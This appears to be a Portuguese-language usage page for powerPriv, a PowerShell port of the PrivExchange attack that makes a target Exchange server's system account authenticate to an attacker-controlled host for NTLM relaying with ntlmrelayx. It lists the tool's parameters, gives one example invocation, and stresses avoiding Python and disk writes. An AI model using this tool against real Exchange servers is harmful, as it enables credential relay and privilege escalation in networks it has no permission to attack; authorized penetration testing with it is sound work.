
Uma implementação em PowerShell do PrivExchange projetada para ser executada no contexto do usuário atual
Uma implementação em powershell do PrivExchange por @_dirkjan (código original encontrado aqui: https://github.com/dirkjanm/PrivExchange/blob/master/privexchange.py) Útil para ambientes onde você não pode executar aplicativos baseados em Python, possui credenciais de usuário ou não deseja gravar arquivos no disco. Fará com que a conta do sistema do servidor Exchange de destino tente autenticar em um sistema de sua escolha.
-targetHostNome do host ou IP da caixa de Exchange de destino. Com base na configuração de DNS, pode exigir FQDN se usar nome do host. (Obrigatório)
-attackerHostNome do host ou IP de um sistema que você controla e, idealmente, está executando ntlmrelayx nele. Estamos dizendo ao servidor Exchange para tentar autenticar neste sistema. Com base na configuração de DNS, pode exigir FQDN se usar nome do host. (Obrigatório)
-exchangePortPorta para tentar conectar ao servidor Exchange. O padrão é 443.
-attackerPortPorta que o Exchange deve tentar conectar de volta ao atacante. O padrão é 80
-attackerPagePágina que estamos dizendo ao servidor Exchange para conectar em nosso sistema de ataque. Barras não são necessárias. O padrão é powerPriv.
-noSSLDefina como true se você não quiser usar https para conectar inicialmente ao servidor Exchange. O padrão é false (usar https).
-VersionVersão do servidor Exchange que estamos almejando. O padrão é 2013.
powerPriv -targetHost corpExch01 -attackerHost 192.168.1.17 -Version 2016
Autor: @g0ldenGunSec - Baseado na ferramenta criada por @_dirkjan
Use esta ferramenta apenas em redes que você possui ou tem permissão para testar.